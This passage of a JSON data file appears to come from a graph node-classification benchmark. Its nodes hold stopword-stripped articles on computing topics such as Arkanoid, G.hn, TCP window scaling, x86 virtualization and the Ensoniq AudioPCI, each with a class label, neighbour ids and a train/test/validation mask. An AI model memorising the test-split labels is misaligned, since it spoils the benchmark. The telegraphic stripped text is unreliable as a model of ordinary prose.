unprotected causing loss life property damage even water supplies could attacked sewer systems compromised calculation given cost damages estimated cost replace critical water systems could hundreds billions dollars water infrastructures well developed making hard cyber-attacks cause significant damage equipment failure occur causing power outlets disrupted short time",
    "neighbors": [
      5636,
      10756,
      7174,
      9233,
      535,
      10777,
      9771,
      3125,
      7739,
      7228,
      4163,
      6211,
      6735,
      612,
      107,
      5245,
      5774,
      4755,
      2709,
      10392,
      9375,
      176,
      1200,
      2737,
      8881,
      6842,
      4813,
      1251,
      5373,
      4863,
      3843,
      8978,
      4883,
      278,
      1827,
      3880,
      297,
      9000,
      10539,
      2878,
      11594,
      6992,
      4945,
      1369,
      7515,
      4956,
      11611,
      1888,
      9058,
      7526,
      7528,
      2409,
      3433,
      6013,
      10110,
      5002,
      4495,
      6031,
      3473,
      8095,
      5025,
      3495,
      943,
      4016,
      1970,
      8637,
      11198,
      1474,
      8130,
      11202,
      1479,
      10190,
      3024,
      9688,
      8667,
      3552,
      8167,
      8170,
      2041,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 4690,
    "label": 3,
    "text": "Arkanoid:arkanoid player controls vaus space vessel acts game paddle prevents ball falling playing field attempting bounce number bricks ball striking brick causes brick disappear bricks gone player goes next level another pattern bricks appears number variations bricks hit multiple times flying enemy ships etc power-up capsules enhance vaus expand vaus multiply number balls equip laser cannon break directly next level etc gameplay remains final stage 33 versions 36 nes player takes game boss doh head resembling moai point reached player longer option continue running lives making segment difficult game regardless outcome japan gave silver award one four best games 1986 along taito bubble bobble sega fantasy zone tecmo rygar europe reviewed clare edgeley december 1986 issue computer video games compared pong space invaders simplicity addictiveness described arkanoid lovely game fast colourful simple addictive concluded great little game also commercially successful arcades game appeared number-three euromax nationwide uk arcade chart 1987 capcom 1942 number-one westone wonder boy number-two home versions also well received computer gaming world stated 1988 arkanoid amiga perfect version arcade game ... incredible named nes version best arcade translation console year praising graphics play mechanics game reviewed 1989 dragon 144 hartley patricia kirk lesser role computers column reviewers gave game 5 5 stars compute named game list nine great games 1989 describing hypnotic addictive fascinating along breakout magazine noted arkanoid also elements pong space invaders well pac-man use power-ups arkanoid ported zx spectrum amstrad cpc commodore 64 bbc micro msx atari 8-bit family apple ii nes amiga atari st apple ii ibm pc macintosh version released 1987 port released tandy color computer 3 1989 computer conversions published imagine nes port packaged custom controller arkanoid followed number direct indirect sequels tournament arkanoid released 1987 exclusively united states romstar unlike original game developed taito america rather taito japan mission-pack sequel true sequel since exact gameplay original arkanoid levels different. arkanoid 2 released arcades 1987 unlike tournament arkanoid revenge doh true sequel game featuring new gameplay mechanics. arkanoid returns published 1997 followed arkanoid ds 2007 xbox 360 version arkanoid titled arkanoid live released may 6 2009 xbox live arcade wiiware version arkanoid titled arkanoid plus released japan may 26 2009 pal regions august 21 2009 north america september 28 2009 version arkanoid iphone released worldwide august 31 2009 mashup arkanoid vs. space invaders released 2017 ios android arkanoid world-record score belongs zack hample known snagged 10,000 baseballs major league baseball games",
    "neighbors": [
      3075,
      9732,
      8709,
      9735,
      5275,
      9501,
      1693,
      4894,
      8492,
      9006,
      10931,
      5692,
      4043,
      3788,
      10188,
      9166,
      11477,
      3039,
      11231,
      7916,
      2159,
      1776,
      4082,
      6390
    ],
    "mask": "Test"
  },
  {
    "node_id": 4691,
    "label": 5,
    "text": "G.hn:g.hn g.hn specification home networking data rates 2 gbit/s operation four types legacy wires telephone wiring coaxial cables power lines plastic optical fiber single g.hn semiconductor device able network supported home wire types benefits multi-wire standard lower equipment development costs lower deployment costs service providers allowing customer self-install g.hn developed international telecommunication union telecommunication standardization sector itu-t promoted homegrid forum several organizations itu-t recommendation itu term standard g.9960 received approval october 9 2009 specified physical layers architecture g.hn data link layer recommendation g.9961 approved june 11 2010 key promoters cepca homepna upa creators two interfaces united behind latest version standard february 2009 itu-t extended technology multiple input multiple output mimo technology increase data rates signaling distance new feature approved march 2012 g.9963 recommendation amendments main g.9960/g.9961 added new functionalities base standard g.hn specifies single physical layer based fast fourier transform fft orthogonal frequency-division multiplexing ofdm modulation low-density parity-check code ldpc forward error correction fec code g.hn includes capability notch specific frequency bands avoid interference amateur radio bands licensed radio services g.hn includes mechanisms avoid interference legacy home networking technologies also wireline systems vdsl2 types dsl used access home ofdm systems split transmitted signal multiple orthogonal sub-carriers g.hn one sub-carriers modulated using qam maximum qam constellation supported g.hn 4096-qam 12-bit qam g.hn media access control based time division multiple access tdma architecture domain master schedules transmission opportunities txops used one devices domain two types txops although elements g.hn common three media supported standard power lines phone lines coaxial cable g.hn includes media-specific optimizations media media-specific parameters include g.hn uses advanced encryption standard aes encryption algorithm 128-bit key length using ccmp protocol ensure confidentiality message integrity authentication key exchange done following itu-t recommendation x.1035 g.hn specifies point-to-point security inside domain means pair transmitter receiver uses unique encryption key shared devices domain example node alice sends data node bob node eve domain alice bob able easily eavesdrop communication g.hn supports concept relays one device receive message one node deliver another node farther away domain relaying becomes critical applications complex network topologies need cover large distances found industrial utility applications relay read source target addresses read message content due body end-to-end-encrypted g.hn architecture includes concept profiles profiles intended address g.hn nodes significantly different levels complexity g.hn higher complexity profiles proper supersets lower complexity profiles devices based different profiles interoperate examples g.hn devices based high complexity profiles residential gateways set-top boxes examples g.hn devices based low complexity profiles home automation home security smart grid devices g.hn spectrum depends medium shown diagram g.hn specifies physical layer data link layer according osi model pmd sub-layer sub-layer g.hn stack medium dependent i.e. parameters may different values media power lines phone lines coaxial cable rest sub-layers apc llc mac pcs pma medium independent interface application entity data link layer called a-interface interface data link layer physical layer called medium independent interface mii interface physical layer actual transmission medium called medium dependent interface mdi recommendation g.9960 granted approval october 2009 study group 15 plenary meeting recommendation g.9961 received approval june 11 2010 meeting concerns regulatory conformance raised amendment g.hn standard proposed eliminated passband 100 mhz 200 mhz reduced baseband operational spectrum 100 mhz 80 mhz changes included amendment included reduction transmit power meet regulatory complaints raised meeting june 2011 joint forum held itu-t itu-r organizations recognized itu-t g.hn considered electromagnetic compatibility emc mitigation techniques go well beyond considered essential protecting radio services non-itu compliant home network equipment may cause problems october 2010 sigma designs announced first g.hn-compliant chipset called cg5110 january 2011 lantiq introduced family g.hn-compliant chips called hnx176 hnx156 june 2011 four silicon vendors lantiq marvell semiconductor metanoia sigma designs announced participation open interoperability plugfest geneva hosted homegrid forum broadband forum itu homegrid forum showcased world first live public demonstration g.hn interoperability ces january 10–13 2012 homegrid forum members lantiq marvell metanoia sigma designs joined together highlight real-world g.hn capabilities january 2012 tangotec ltd. announced fully compliant itu-t g.hn chipset family available 2012 tangotec demonstrated g.hn capabilities three media ces 2012 december 2012 marvell homegrid forum announced marvell g.hn silicon passed compliance tests first compliance certified g.hn silicon first certified g.hn silicon interop testing remains homegrid forum non-profit trade group promoting g.hn homegrid forum provides technical marketing efforts addresses certification interoperability g.hn-compliant products cooperates complementary industry alliances homegrid forum members include actiontec electronics inc. allion test labs inc. arris bc institute technology best buy british telecom bt chunghwa telecom comtrend corporation holland electronics llc institute information industry iii korea electrotechnology research institute keri korea polytechnic university kpu kwangwoon university lan s.a.r.l marvell metanoia communications inc. mitrastar sigma designs teleconnect gmbh telefónica university british columbia trac global xingtera inc vendors promoting g.hn include maxlinear lantiq devolo ag microprocessor manufacturer intel system-on-a-chip vendor sigma designs xingtera announced product january 2013 first live public demonstration g.hn interoperability shown ces january 10–13 2012 lantiq marvell technology group metanoia sigma designs february 26 2009 part homepna press release makes use wireline home networking part u-verse iptv service expressed support work developed itu-t creating standards home networking including g.hn service providers like promoted g.hn service providers contributors work itu-t study group include british telecom telefónica april 2008 first announcement homegrid forum echostar manufacturer set-top boxes service provider market expressed support unified standard march 2009 best buy largest retailer consumer electronics united states joined board directors homegrid forum expressed support g.hn panasonic one largest manufacturers consumer electronics also contributor member homegrid forum 2008 several marketing firms promoted g.hn made optimistic predictions february 25 2009 three home networking organizations promoted previously incompatible technologies cepca homepna universal powerline association announced agreed work homegrid forum promote g.hn single next-generation standard wired home networking work ensure coexistence existing products market october 2008 continental automated buildings association caba homegrid forum signed liaison agreement support homegrid forum efforts conjunction itu-t g.hn make easy consumers connect devices enjoy innovative applications using existing home wiring july 2009 homegrid forum dlna signed liaison agreement setting stage collaboration two organizations approval g.hn dlna-recognized physical layer technology june 2010 broadband forum homegrid forum signed agreement deliver compliance interoperability testing program products using g.hn technology broadband forum support homegrid forum validation g.hn products promotion product conformance interoperability help expedite total time market homegrid forum certified products may 2011 organizations jointly announced first open g.hn plugfest itu g.9970 also known g.hnta recommendation developed itu-t describes generic architecture home networks interfaces operators broadband access networks itu g.9972 also known g.cx recommendation developed itu-t specifies coexistence mechanism home networking transceivers capable operating power line wiring coexistence mechanism would allow g.hn devices implement g.9972 coexist devices implementing g.9972 operating power line wiring itu g.9991 also known g.vlc recommendation developed itu-t specifies phy dll high speed indoor visible light communication transceivers used applications li-fi g.vlc reuses phy dll g.hn enabling chips used applications major motivation wired home networking technologies iptv especially offered service provider part triple play service voice data service offering u-verse smart grid applications like home automation demand side management also targeted g.hn-compliant devices implement low-complexity profiles many customers homes residential gateway provides internet access located close iptv set-top box scenario becomes common service providers start offer service packages multiple set-top boxes per subscriber g.hn connect residential gateway one set-top boxes using existing home wiring using g.hn iptv service providers need install new ethernet wires 802.11 wireless networks g.hn supports kind home wiring end users might install iptv home network thus reducing cost service provider although wi-fi technology popular consumer home networks g.hn also intended use application g.hn adequate solution consumers situations using wireless needed example connect stationary device like tv network-attached storage device desired due security concerns feasible example due limited range wireless signals consumer electronics ce products support internet connectivity using technologies wi-fi bluetooth ethernet many products traditionally associated computer use tvs hi-fi equipment provide options connect internet computer using home network provide access digital content g.hn intended provide high-speed connectivity ce products capable displaying high definition television integrating power connection data connection provides potential energy savings ce devices given ce devices home theater receivers often run standby vampire power represent major savings homeowners power connection also data connection device could reliably turned displaying source g.hn operate wires including ac dc power lines provide communication infrastructure required smart grid applications comprehensive smart grid system requires reaching every ac outlet home building devices participate energy conserving strategies september 2009 us national institute standards technology included g.hn one standards smart grid believed strong stakeholder consensus part early draft nist framework roadmap smart grid interoperability standards january 2010 g.hn removed final version standards identified implementation broad concept smart grid includes applications overlapping scopes demand side management energy conservation measures advanced metering infrastructure ami home networks g.hn supports popular protocols like ipv4 ipv6 g.hn-based networks easily integrated ip-based networks well-known network management protocols like simple network management protocol snmp manage ip networks including g.hn devices",
    "neighbors": [
      4609,
      11267,
      9860,
      1541,
      3847,
      6670,
      1297,
      7698,
      2203,
      2206,
      10270,
      10021,
      9640,
      3629,
      11181,
      5433,
      7865,
      3133,
      2752,
      11332,
      7498,
      5581,
      4691,
      2772,
      5469,
      5470,
      8160,
      1121,
      1893,
      7400,
      7407,
      5875,
      7411,
      5373,
      5118,
      2431
    ],
    "mask": "Test"
  },
  {
    "node_id": 4692,
    "label": 5,
    "text": "TCP_window_scale_option:tcp window scale option tcp window scale option option increase receive window size allowed transmission control protocol former maximum value 65,535 bytes tcp option along several others defined ietf rfc 1323 deals long fat networks lfns throughput communication limited two windows congestion window receive window congestion window tries exceed capacity network congestion control receive window tries exceed capacity receiver process data flow control receiver may overwhelmed data example busy web server tcp segment contains current value receive window example sender receives ack acknowledges byte 4000 specifies receive window 10000 bytes sender send packets byte 14000 even congestion window allows tcp window scale option needed efficient transfer data bandwidth-delay product bdp greater 64k instance t1 transmission line 1.5 mbit/second used satellite link 513 millisecond round trip time rtt bandwidth-delay product formula_1 bits 96,187 bytes using maximum buffer size 64 kib allows buffer filled 65,535 96,187 68 theoretical maximum speed 1.5 mbits/second 1.02 mbit/s example receive window formula_2 bytes receive window 2 bytes tcp header window scale factor options tcp 3 calculation follows formula_3 bytes essence formula_4 shifting 3 bits left note options field window scale factor sent syn packet also value window scale factor go 255 formula_5 byte maximum allowed 14 reason maximum value 14 formula_6 increases beyond surpass sequence sequence 4 bytes formula_7 size window ca n't go beyond maximum value sequence using window scale option receive window size may increased maximum value 1,073,725,440 bytes done specifying one byte shift count header options field true receive window size left shifted value shift count maximum value 14 may used shift count value would allow single tcp connection transfer data example satellite link 1.5 mbit/second utilizing available bandwidth essentially one full transmission window transferred within one round-trip time period window scale option enables single tcp connection fully utilize lfn bdp 1 gb e.g 10 gbit/s link round-trip time 800 ms. firewalls properly implement tcp window scaling cause user internet connection malfunction intermittently minutes appear start working reason also issue firewall n't support tcp extensions tcp window scaling implemented windows since windows 2000 enabled default windows vista server 2008 newer turned manually required windows vista windows 7 fixed default tcp receive buffer 64 kb scaling 16 mb autotuning limiting manual tcp tuning long fat networks linux kernels 2.6.8 august 2004 enabled tcp window scaling default configuration parameters found /proc filesystem see pseudo-file companions information section sysctl scaling turned issuing command root maintain changes restart include line systemd 207 default setting freebsd openbsd netbsd mac os x window scaling features related rfc 1323 enabled verify status user check value variable via sysctl command value 1 output means scaling enabled 0 means disabled enabled turned issuing command setting lost across system restart ensure set boot time add following line /etc/sysctl.conf codice_1",
    "neighbors": [
      8192,
      10115,
      1541,
      10924,
      6797,
      2221,
      4918
    ],
    "mask": "Train"
  },
  {
    "node_id": 4693,
    "label": 3,
    "text": "Brian_Jacks_Superstar_Challenge:brian jacks superstar challenge brian jacks superstar challenge 1985 sports simulation game released various home computers martech licensed british sportsman brian jacks released systems including commodore 64 bbc micro acorn electron electron user praised superb graphics variety found different games",
    "neighbors": [
      9006
    ],
    "mask": "Test"
  },
  {
    "node_id": 4694,
    "label": 4,
    "text": "WhiteSource:whitesource whitesource open source security license compliance management platform founded 2011 ron rymon azi cohen rami sass company founded three co-founders sold previous company eurekify ca technologies due diligence process co-founders experienced first hand challenge generating accurate open source inventory report company launched open source license management platform software discovers open source components customers ’ apps alerts vulnerable code added software projects used threats pop affect existing software main investors company include susquehanna growth equity 83north microsoft ventures david strohm israeli innovation authority company raised 46 million 2018 whitesource bolt launched 2016",
    "neighbors": [],
    "mask": "Validation"
  },
  {
    "node_id": 4695,
    "label": 3,
    "text": "X86_virtualization:x86 virtualization article documents hardware capabilities cpus implementing x86 x86-64 instruction sets regards hardware-assisted virtualization late 1990s x86 virtualization achieved complex software techniques necessary compensate processor lack hardware-assisted virtualization capabilities attaining reasonable performance 2006 intel vt-x amd amd-v introduced limited hardware virtualization support allowed simpler virtualization software offered speed benefits greater hardware support allowed substantial speed improvements came later processor models following discussion focuses virtualization x86 architecture protected mode protected mode operating system kernel runs higher privilege ring 0 applications lower privilege ring 3 software-based virtualization host os direct access hardware guest oss limited access hardware like application host os one approach used x86 software-based virtualization overcome limitation called ring deprivileging involves running guest os ring higher lesser privileged 0 three techniques made virtualization protected mode possible techniques incur performance overhead due lack mmu virtualization support compared vm running natively virtualizable architecture ibm system/370 traditional mainframes classic type 1 hypervisor self-standing depend operating system run user applications contrast first x86 virtualization products aimed workstation computers ran guest os inside host os embedding hypervisor kernel module ran host os type 2 hypervisor controversy whether x86 architecture hardware assistance virtualizable described popek goldberg vmware researchers pointed 2006 asplos paper techniques made x86 platform virtualizable sense meeting three criteria popek goldberg albeit classic trap-and-emulate technique different route taken systems like denali l4 xen known paravirtualization involves porting operating systems run resulting virtual machine implement parts actual x86 instruction set hard virtualize paravirtualized i/o significant performance benefits demonstrated original sosp'03 xen paper initial version x86-64 amd64 allow software-only full virtualization due lack segmentation support long mode made protection hypervisor memory impossible particular protection trap handler runs guest kernel address space revision later 64-bit amd processors rule thumb manufactured 90 nm less added basic support segmentation long mode making possible run 64-bit guests 64-bit hosts via binary translation intel add segmentation support x86-64 implementation intel 64 making 64-bit software-only virtualization impossible intel cpus intel vt-x support makes 64-bit hardware assisted virtualization possible intel platform platforms possible run 64-bit guest 32-bit host os underlying processor 64-bit supports necessary virtualization extensions 2005 2006 intel amd working independently created new processor extensions x86 architecture first generation x86 hardware virtualization addressed issue privileged instructions issue low performance virtualized system memory addressed mmu virtualization added chipset later based painful experiences 80286 protected mode suitable enough run concurrent ms-dos applications well intel introduced virtual 8086 mode 80386 chip offered virtualized 8086 processors 386 later chips hardware support virtualizing protected mode however became available 20 years later amd developed first generation virtualization extensions code name pacifica initially published amd secure virtual machine svm later marketed trademark amd virtualization abbreviated amd-v may 23 2006 amd released athlon 64 orleans athlon 64 x2 windsor athlon 64 fx windsor first amd processors support technology amd-v capability also features athlon 64 athlon 64 x2 family processors revisions f g socket am2 turion 64 x2 opteron 2nd generation third-generation phenom phenom ii processors apu fusion processors support amd-v. amd-v supported socket 939 processors sempron processors support huron sargas amd opteron cpus beginning family 0x10 barcelona line phenom ii cpus support second generation hardware virtualization technology called rapid virtualization indexing formerly known nested page tables development later adopted intel extended page tables ept cpu flag amd-v svm may checked bsd derivatives via dmesg sysctl linux via codice_1 previously codenamed vanderpool vt-x represents intel technology virtualization x86 platform november 13 2005 intel released two models pentium 4 model 662 672 first intel processors support vt-x cpu flag vt-x capability vmx linux checked via codice_1 macos via codice_3 vmx stands virtual machine extensions adds ten new instructions vmptrld vmptrst vmclear vmread vmwrite vmcall vmlaunch vmresume vmxoff vmxon instructions permit entering exiting virtual execution mode guest os perceives running full privilege ring 0 host os remains protected almost newer server desktop mobile intel processors support vt-x intel atom processors primary exception motherboards users must enable intel vt-x feature bios setup applications make use intel started include extended page tables ept technology page-table virtualization since nehalem architecture released 2008 2010 westmere added support launching logical processor directly real mode feature called unrestricted guest requires ept work since haswell microarchitecture announced 2013 intel started include vmcs shadowing technology accelerates nested virtualization vmms virtual machine control structure vmcs data structure memory exists exactly per vm managed vmm every change execution context different vms vmcs restored current vm defining state vm virtual processor soon one vmm nested vmms used problem appears way similar required shadow page table management invented described cases vmcs needs shadowed multiple times case nesting partially implemented software case hardware support processor make shadow vmcs handling efficient intel implemented hardware support vmcs shadowing via nano 3000 series processors higher support via vt virtualization technology compatible intel vt 2012 amd announced advanced virtual interrupt controller avic targeting interrupt overhead reduction virtualization environments technology announced support x2apic 2016 avic available amd family 15h models 6xh carrizo processors newer also 2012 intel announced similar technology interrupt apic virtualization brand name announcement time later branded apic virtualization apicv became commercially available ivy bridge ep series intel cpus sold xeon e5-26xx v2 launched late 2013 xeon e5-46xx v2 launched early 2014 graphics virtualization technology introduced intel iris pro intel integrated gpu either dedicatedly assigned virtual machine gvt-d shared multiple virtual machines time-sharing basis using native graphics driver gvt-g shared multiple virtual machines using virtual graphics driver gvt-s memory i/o virtualization performed chipset typically features must enabled bios must able support also set use input/output memory management unit iommu allows guest virtual machines directly use peripheral devices ethernet accelerated graphics cards hard-drive controllers dma interrupt remapping sometimes called pci passthrough iommu also allows operating systems eliminate bounce buffers needed allow communicate peripheral devices whose memory address spaces smaller operating system memory address space using memory address translation time iommu also allows operating systems hypervisors prevent buggy malicious hardware compromising memory security amd intel released iommu specifications addition cpu support motherboard chipset system firmware bios uefi need fully support iommu i/o virtualization functionality usable pci pci express devices supporting function level reset flr virtualized way required reassigning various device functions virtual machines device assigned support message signaled interrupts msi must share interrupt lines devices assignment possible conventional pci devices routed behind pci/pci-x-to-pci express bridge assigned guest virtual machine pci express devices restriction pci-sig single root i/o virtualization sr-iov provides set general non-x86 specific i/o virtualization methods based pci express pcie native hardware standardized pci-sig sr-iov common host vmm configures supported devices create allocate virtual shadows configuration spaces virtual machine guests directly configure access shadow device resources sr-iov enabled virtualized network interfaces directly accessible guests avoiding involvement vmm resulting high overall performance example sr-iov achieves 95 bare metal network bandwidth nasa virtualized datacenter amazon public cloud",
    "neighbors": [
      3586,
      5378,
      7940,
      3973,
      6150,
      7941,
      6153,
      6924,
      8333,
      11539,
      8725,
      4886,
      2334,
      8625,
      823,
      9655,
      5049,
      2237,
      5822,
      10813,
      6339,
      9157,
      6730,
      2379,
      7117,
      1614,
      7248,
      1745,
      5457,
      7377,
      1237,
      7039,
      5080,
      602,
      2525,
      3294,
      1247,
      1632,
      8671,
      11624,
      1513,
      1515,
      5356,
      6254,
      7151,
      1776,
      1137,
      499,
      1915,
      9340,
      4734,
      255
    ],
    "mask": "None"
  },
  {
    "node_id": 4696,
    "label": 1,
    "text": "Clustrix:clustrix clustrix inc. san francisco-based private company founded 2006 develops database management system marketed newsql clustrix founded november 2006 sometimes called sprout-clustrix formed help combinator founders include paul mikesell formerly emc isilon sergei tsarev technology tested customers since 2008 initially called sierra official announcement 2010 product called clustered database system cds company received 10 million funding sequoia capital u.s. venture partners usvp ata ventures december 2010 robin purohit became chief executive october 2011 another round 6.75 million raised july 2012 another round funding original backers 16.5 million announced may 2013 round 10 million new funding august 2013 led highbar ventures purohit replaced mike azevedo 2014 round 23 million debt financing disclosed february 2016.. september 20 2018 announced clustrix acquired mariadb corporation clustrix supports workloads involve scaling transactions real-time analytics system drop-in replacement mysql designed overcome mysql scalability issues minimum disruption also built fault-tolerance features high availability within cluster parallel backup parallel replication among clusters disaster recovery clustrix scale-out sql database management system part often called newsql database systems modern relational database management systems closely following nosql movement product marketed hardware appliance using infiniband 2014 clustrix database made available downloadable software amazon web services marketplace 2013 primary competitors like microsoft sql server mysql supported online transaction processing online analytical processing distributed clustrix provides distributed relational acid database scales transactions support real-time analytics distributed relational databases columnar n't support primary transaction workload focus offline analytics includes emc greenplum hp vertica infobright amazon redshift notable players primary sql database space in-memory includes voltdb memsql excel low-latency transactions target real-time analytics nosql competitors like mongodb good handling unstructured data read heavy workloads compete space write heavy workloads transactions coarse grained db-level locking sql features like joins newsql nosql databases complementary clustrix database operates distributed cluster shared-nothing nodes using query data approach nodes typically subset data sql queries split query fragments sent nodes data enables clustrix scale horizontally scale additional nodes added clustrix database automatically splits distributes data evenly across nodes slice copies nodes uniform data distribution maintained nodes added removed data inserted unevenly automatic data distribution approach removes need shard enables clustrix maintain database availability face node loss performance test completed percona 2011 three-node cluster saw 73 increase speed similarly equipped single mysql server running tests 1024 simultaneous threads additional nodes added clustrix cluster provided roughly linear increases speed",
    "neighbors": [
      10048,
      11136,
      1636,
      5640,
      5960,
      7499,
      8683,
      7022,
      10286,
      7248,
      4817,
      3219,
      2901,
      1142,
      7767,
      10389,
      11030,
      7802
    ],
    "mask": "None"
  },
  {
    "node_id": 4697,
    "label": 9,
    "text": "OpenWebGlobe:openwebglobe openwebglobe project technology processing interactively visualizing vast volumes geospatial data 3d virtual globe openwebglobe virtual globe several data categories like image data elevation data points interest vector data 3d objects streaming massive complex data internet data must pre-processed pre-processing usually comprises transformation local global reference system creation pyramid layers levels detail lod tiling data optionally compression encryption recently algorithms ported high performance compute cluster using openmp mpi also released open-source data sets usually large containing several terabytes advanced out-of-core rendering mechanisms level detail approach used visualization openwebglobe open-source project written webgl lead developer institute geomatics engineering university applied sciences northwestern switzerland openwebglobe sdk also 3d engine top webgl openwebglobe sdk possible create custom virtual globe applications javascript hello world example creates virtual globe adds image elevation layer demo version potential 3d viewer codice_1 geo-portal swiss confederation online openwebglobe website july 31 2012 scene covered entire switzerland based high resolution data swisstopo swissimage",
    "neighbors": [
      803,
      5612,
      7983
    ],
    "mask": "Test"
  },
  {
    "node_id": 4698,
    "label": 3,
    "text": "L'Empereur:l'empereur user controls napoleon bonaparte napoleonic wars late 18th early 19th centuries goal conquer europe game begins napoleon army officer victories combat user may get promoted commander-in-chief first consul finally emperor french powers actions available level emperor user also controls napoleon brothers louis jérôme lucien joseph well napoleon stepson eugene beauharnais game military civilian aspects user lead armies act mayor cities depending level achieved engage diplomacy nations historically accurate game reproduces many historical figures militaries europe great detail player chooses one four scenarios loads saved game starts different years earliest scenario napoleon commander marseille 1796 historically poised invasion italy second scenario napoleon st. malo commander-in-chief 1798 third scenario arguably easiest starting point napoleon first consul france 1802 final scenario napoleon emperor starts 1806 mode player control napoleon siblings stepson well turn lasts one full month per year total 12 turns per year although years change every january march gameplay elements affected game engine drafting soldiers officers termination certain diplomatic agreements collection taxes month player well commanders cities manage military civil affairs respective cities additionally every three months starting march national leaders may carry diplomatic national affairs crux gameplay rests actual battles take place special tiled battlefields arranged hexes opposing commanders place armies accordingly maneuver around battlefield battle defenders responsibility keeping city hexes control repelling enemy attackers either take city hexes annihilate defenders run food forced retreat number terrain features add depth gameplay swamps forests hills mountains rivers tundra also seasons weather affect battle invasions winter months causing bodies water freeze generally slowing movement troops troops frozen water fall bombarded happened battle austerlitz army may consist three types units basic infantry build explode bridges cavalry charge enemy allowing repeatedly attack unit single turn artillery bombard enemies afar unit three main factors determining well fight strength go 200 soldiers per unit training affects accurate unit attacks speed unit moves morale determines well unit absorbing attacks avoiding falling crippling disorder additionally unit commanding officer ratings leadership experience commanding unit type infantry cavalry artillery affects unit attack/defense power morale napoleon player basic goal conquer europe many players could daunting task time sheer size task require patient planning careful strategizing accomplish scenario presents easier goal achieve basically napoleon promoted commander c-in-c first consul emperor l'empereur features large number historical figures including emperor alexander russia king george iii britain duke wellington marshal kutusov russia general blücher prussia archduke charles austria many french generals masséna macdonald davout soult lannes oudinot berthier also appear give significant advantage france political figures also make appearances talleyrand godoy metternich game models several nations republican imperial france including kingdom naples republic venice prussia britain holland bavaria spain portugal ottoman empire turkey austria denmark sweden russia historical events portrayed napoleon invasion egypt divorce josephine marriage marie louise napoleon overthrowing barras also portrayed although events napoleon overthrow peacefully also modeled russian cossacks spanish guerrillas greatly complicating invasions respective countries plague also appear disaster game permits recreation battle trafalgar occurs whenever napoleon attempts invade england gibraltar sea nelson killed england gets free naval victory france french naval force small english automatically win combat lord nelson die computer gaming world disliked game historical inaccuracies describing disappointing seeking computer version empires arms miniature wargame 1993 survey pre 20th-century strategy games magazine gave game one-plus stars five stating little ambience napoleonic era including unrealistic artillery ranges",
    "neighbors": [
      11477,
      9006
    ],
    "mask": "None"
  },
  {
    "node_id": 4699,
    "label": 3,
    "text": "Ensoniq_AudioPCI:ensoniq audiopci ensoniq audiopci pci-based sound card released 1997 ensoniq last sound card product acquired creative technology card represented shift ensoniq market positioning whereas soundscape line made primarily low-volume high-end products full features audiopci designed simple low-cost product appeal system oems thus hopefully sell mass quantities towards end 1990s ensoniq struggling financially cards popular pc oems costs high musical instrument division fading revenue pressure intense competition especially dominant creative labs forcing audio card makers try keep prices low audiopci released july 1997 designed primarily cheap comparison wide variety chips sheer size older soundscape boards highly integrated two chip design audiopci obvious shift design philosophy board consists small software-driven audio chip one following s5016 es1370 es 1371 companion digital-to-analog converter dac another cost-cutting move previously typical rom chip used storage samples sample-based synthesis replaced facility use system ram storage audio data made possible move pci bus far greater bandwidth efficient bus mastering interface compared older isa bus standard audiopci designed cheap still quite functional offers many audio capabilities soundscape elite card surpasses soundscape cards notably audiopci supports several digital effects reverb chorus spatial enhancement used microsoft windows 95 later versions windows audiopci surprises market one first cards microsoft directsound3d 4-speaker playback support 4-speaker mode activated software supporting directsound3d quadraphonic mode oddity rear channel connected output jack line input jack switches modes 4-speaker output became active dos windows drivers support sample-based synthesis ensoniq .ecw patch set format several patch set choices available varying size instrument quality 2 4 8 mb .ecw file format ensoniq concert wavetable never made open hoped enthusiasts consequently custom wave sets available contrast huge availability home-made releases e-mu soundfont format particularly unfortunate audiopci used system ram patch set storage offers tremendous potential new patch sets traditional rom storage previously used also disappointing considering incredible popularity longevity ensoniq es1370 chipset descendants still use six years original audiopci board fact dos drivers far newer sound blaster audigy still use .ecw wave sets newer cards unable use soundfonts dos limiting three official .ecw wavesets late '90s one incomplete unofficial waveset audiopci supported dos games applications using software driver would install dos real-mode boot-time portion windows 9x driver virtualized sound blaster-compatible isa sound card use pc nmi tsr program allowed audiopci compatible out-of-the-box dos support pci competitors time example competing monster sound diamond multimedia limited running dos games windows 9x-based dos command windows meaning dos compatibility frequently reliable additional isa sound card creative struggling challenge legacy support well created sb-link interconnect allowed access serial-irq pc/pci grant/request sideband signals offered pci chipsets time order achieve dos compatibility sound blaster awe64-variant pci sound cards sb-link also used number chipset vendors ess yamaha ensoniq approach generally worked games older games problems detecting virtualized hardware systems addition dos driver required memory manager emm386 loaded required additional conventional memory space also put cpu virtual-86 mode conflicting games utilized modified form protected mode called 'flat mode mode allowed fast direct access system entire ram without requiring memory manager memory protection mechanism requirement exclusive audiopci however number isa sound cards used well including creative awe isa series audiopci dos driver included ensoniq soundscape 16-bit digital audio sample-based synthesis support along support sound blaster pro adlib gold general midi mt-32 however without actual hardware fm synthesis fm music sound effects simulated using samples often unacceptable results therefore practical configure dos games utilize general midi synthesizer digital sound effects whenever possible better sound quality dos midi utilizes .ecw patch set files windows midi part deal ensoniq purchased creative labs integrate audiopci dos driver upcoming sound blaster live creative added sound blaster 16 emulation driver removed ensoniq soundscape support audiopci re-branded several creative labs sound cards including sound blaster pci 64 pci 128 vibra pci others ensoniq es1370 audio chip renamed creative 5507 revised ac'97-compliant variants es1371 es1373 used several years card integrated motherboard audio cards es1370 run natively 44 khz sampling frequency meaning 12 24 32 48 khz become resampled resampling means lower sound quality worse synchronization possibly higher cpu utilization cards es1371 run 48 khz conforming ac97 11 22 44 khz become resampled soundcards feature multiple quartzes pll resampling often used potential problems creative labs malvern former ensoniq company acquired later released ectiva 1938 ev1938 single chip pci audio controller based es1371/es1373 register compatible previous chips main difference ev1938 previous chips inclusion built-in ac'97 codec hence producing cheaper single chip audio solution ev1938 also used integrated audio laptops/motherboards cards sound blaster audiopci 64v ct4730 audiopci es1370 developed ensoniq one important feature chip used pci bus instead isa bus commonly used sound cards point one first pci sound card solutions offer ms-dos legacy compatibility without special hardware extensions standard pci slot paired capable codec ak4531 pre-ac'97 es1370 supported then-latest 3d audio positioning 4-speaker surround sound chip also pci bus master device designed provide high-speed access system ram resources sample synthesis data effect processing depending drivers may also called sound blaster 64/128 device manager es1370 one first audio chips support microsoft directsound3d audio api programs took full advantage api capabilities es1370 capable global spatial localized 3d sound effects 2 4-speaker mode chip capable spatializing audio automatically still required directsound3d usage specific localization sounds es1370 also emulated piece virtual hardware qemu vmware ensoniq/creative es1371 es1373 audiopci 97 ac'97-compatible versions https //downloadcenter.intel.com/detail_desc.aspx lang=eng changelang=true 